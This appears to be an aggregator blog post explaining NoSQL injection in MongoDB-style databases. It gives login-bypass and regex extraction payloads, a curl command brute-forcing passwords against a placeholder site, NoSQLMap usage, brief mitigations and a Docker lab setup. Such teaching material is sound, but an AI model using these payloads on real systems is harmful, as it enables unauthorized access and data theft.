NoSQL Injection: The Silent Threat in Modern Databases

By /

Listen to this Post

Featured Image
While SQL Injection (SQLi) dominates headlines, NoSQL Injection lurks as an equally dangerous yet often overlooked vulnerability in applications using databases like MongoDB, CouchDB, or Cassandra. Unlike SQLi, NoSQL attacks exploit query operators ($gt, $ne, $where) or JSON-based input parsing to bypass authentication, dump data, or execute server-side JavaScript.

You Should Know:

1. Basic NoSQL Injection Payloads

  • Bypass Login: 
    { "username": { "$ne": "" }, "password": { "$ne": "" } }

    This tricks the database into returning any user where `username` and `password` are not empty.

  • Extract Data: 

    { "user": { "$regex": "." }, "password": { "$exists": true } }

Uses regex to match all documents.

2. Exploiting MongoDB Operators

  • Blind NoSQLi: 
    curl -X POST http://vulnerable.site/login -H "Content-Type: application/json" -d '{"user":{"$eq":"admin"},"password":{"$regex":"^a"}}'

Bruteforce password characters using regex.

  • Server-Side JS Execution: 
    { "$where": "this.password.length > 0" }

Executes JavaScript in MongoDB (if `$where` is enabled).

3. Mitigation Commands

  • Enable MongoDB Security: 
    mongod --auth --bind_ip 127.0.0.1
  • Input Validation: 
    from pymongo import MongoClient
client = MongoClient()
db = client.secure_db
db.users.find({"username": {"$eq": sanitized_input}})

4. Practice Lab Setup

  • Dockerized Vuln App: 
    docker run -d -p 27017:27017 --name vuln-mongo mongo:4.0
docker run -p 3000:3000 --link vuln-mongo vuln-app

What Undercode Say

NoSQL Injection thrives in APIs and modern stacks. Test for:
– Content-Type: Switch `application/json` to `application/xml` for parser flaws.
– Error Handling: Trigger DB errors with malformed JSON ({"$gt": ""}).
– Tooling: Use `NoSQLMap` (`python nosqlmap.py -u http://target.com`) or Burp Suite’s JSON Query Tampering.

Expected Output:

  • Vulnerable Request: 
    POST /login HTTP/1.1
Content-Type: application/json
{"user":{"$gt":""},"pass":{"$gt":""}}
  • Exploit Result: Bypasses authentication, returns first user in the collection.

Prediction

NoSQLi will surge as more apps abandon SQL for schema-less databases—pen-testers must adapt to JSON/operator-based attacks.

Reference: NoSQL Injection Video Demo

References:

Reported By: Faiyaz Ahmad – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: